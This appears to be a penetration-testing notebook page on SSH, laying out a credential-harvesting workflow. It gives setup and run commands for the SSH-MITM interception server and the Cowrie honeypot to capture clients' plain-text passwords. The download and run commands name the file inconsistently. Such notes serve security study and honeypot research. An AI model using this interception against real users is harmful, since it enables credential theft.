22 - SSH

PRIMARY CATEGORY → PROTOCOLS AND SERVICES

Theory

🛠️⌛

SSH → Secure Shell

SSH Credential Harvesting

Workflow

In this case, we can either force a remote SSH client to connect to us through a certain port, such as the SSH standard port, or wait for an incoming connection

Regardless of how we receive the connection and its subsequent authentication, it would be interesting to view the plain credentials of any client that authenticates against our SSH server

The caveat is that this is not possible with the default configuration of the standard OpenSSH server

However, we can set up either a MITM tool that listens for incoming authentications on the SSH port ( e.g. TCP Port 22 ) and redirects them to the OpenSSH server, such as SSH-MITM, or a honeypot SSH Server that receives authentications and emulates a UNIX system in high interaction mode, such as Cowrie

MITM

SSH-MITM

Setup

curl --silent --location --request GET 'https://github.com/ssh-mitm/ssh-mitm/releases/latest/download/ssh-mitm-x86_64.AppImage' --output ssh-mitm

chmod 700 !$

Usage

./ssh-mitm-x86_64.AppImage server --listen-address '<ADDRESS>' --listen-port '<PORT>'

e.g.

./ssh-mitm-x86_64.AppImage server --listen-address 0.0.0.0 --listen-port 2222

Honeypot

Cowrie

Deploy as a user other than Root

Setup

mkdir Cowrie
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install cowrie
cowrie init
cowrie start

Usage

tail -F var/log/cowrie/cowrie.log

💥Cyb3rBook

Explorer

22 - SSH

PRIMARY CATEGORY → PROTOCOLS AND SERVICES

Theory

SSH Credential Harvesting

Workflow

MITM

Honeypot

Graph View

Table of Contents

Backlinks